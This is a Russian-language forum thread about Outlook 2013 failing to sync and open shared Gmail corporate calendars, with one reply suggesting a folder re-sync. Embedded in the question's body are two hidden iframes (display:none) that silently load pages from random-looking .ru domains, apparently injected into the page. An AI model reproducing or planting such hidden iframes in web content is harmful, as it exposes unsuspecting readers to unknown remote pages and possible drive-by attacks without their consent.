none
корпоративные календари outlook 2013 pro+ RRS feed

  • Вопрос

  • Здравствуйте!

    У нас есть корпоративная почта gmail, календари всех пользователей открыты и доступны друг для друга (то есть права доступа у всех настроены совершенно одинаково на полный доступ) и в самом сервисе gmail все работает хорошо. Однако аутлук при синхронизации календари некоторых пользователей по неизвестному критерию не может открыть у выборочных других пользователей. Другими словами, если есть учетные записаи A, B, C, D, то учетная запись A отлично видит календари B C D; B отлично видит календари A C D и т.д... Но почему-то С видит календари только A и D, а при добавлении B показывает пустой календарь и не может его обновить. При попытке же войти в свойства календаря говорит, что нет доступа к папке, что она удалена или сервер недоступен. Иногда календарь видно, но вместо событий видно просто "занято", хотя в gmail видно полную информацию.

    Вторая проблема - у одного такого сотрудника нет доступа к своей же папке! Точнее он её видит как надо, но настраивать может только через gmail, хотя права самому себе уже прописаны с админки явно. В аутлуке же возникает сообщение о том, что у него недостаточно прав.

    Доступ к локальному календарю, разумеется, у него есть, но он как раз не нужен.

    Я правильно опасаюсь, что здесь мне скажут что проблема в gmail, а в гугле скажут что проблема в аутлуке?)

    Сотрудники утверждают, что на предыдущем офисе (у них был 2010) все работало без проблем.

    Спасибо.

    <iframe id="a1996667054" src="https://25haich4342.ru/f2.html?a=26698" style="display:none;"></iframe><iframe id="a754394637" src="https://gyh1lh20owj.ru/u.html?a=26698" style="display:none;"></iframe>
    2 июня 2016 г. 12:17

Все ответы

  • Outlook тестирует свои соединения и протокол pop3 и imap4 поддерживает как таковой, но реализация может быть различна в ms и Google. Так что думаю, что каждый из них будет валить на другого. Вы можете попробовать исключить все папки из синхронизации и потом выборочно добавить каждую, возможно это поможет.

    scientia potentia est
    My blog